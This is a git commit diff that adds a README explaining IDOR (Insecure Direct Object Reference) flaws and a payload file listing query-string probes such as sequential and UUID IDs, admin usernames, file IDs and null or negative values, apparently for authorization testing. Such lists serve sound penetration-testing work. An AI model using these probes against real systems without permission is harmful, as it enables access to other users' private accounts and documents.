Restructure repository: Remove OWASP categorization, organize by vulnerability type

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

IDOR/README.md

@@ -0,0 +1,17 @@
+# IDOR (Insecure Direct Object References)
+
+## Description
+Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input. As a result, attackers can bypass authorization and access resources directly by modifying the value of a parameter used to point to an object.
+
+## Common Attack Vectors
+- URL parameters (IDs, usernames)
+- API endpoints
+- File references
+- Database keys
+- Session tokens
+
+## Testing Approach
+Manipulate object references (IDs, filenames, keys) to access unauthorized resources belonging to other users.
+
+## Payloads
+See `idor-payloads.txt` for a comprehensive list of IDOR testing techniques and payloads.

IDOR/idor-payloads.txt

@@ -0,0 +1,40 @@
+# IDOR (Insecure Direct Object Reference) Payloads
+
+# Sequential ID manipulation
+?id=1
+?id=2
+?id=100
+?id=1000
+
+# UUID manipulation
+?user_id=00000000-0000-0000-0000-000000000001
+?user_id=11111111-1111-1111-1111-111111111111
+
+# Username/email enumeration
+?user=admin
+?user=administrator
+?user=root
+?email=admin@example.com
+?username=test
+
+# File/Document IDs
+?file_id=1
+?doc_id=1
+?document=private.pdf
+?report_id=1
+
+# Account/Profile manipulation
+?account_id=1
+?profile_id=1
+?customer_id=1
+
+# Negative and special values
+?id=-1
+?id=0
+?id=999999
+?id=null
+?id=undefined
+
+# Array/Multiple IDs
+?id[]=1&id[]=2
+?ids=1,2,3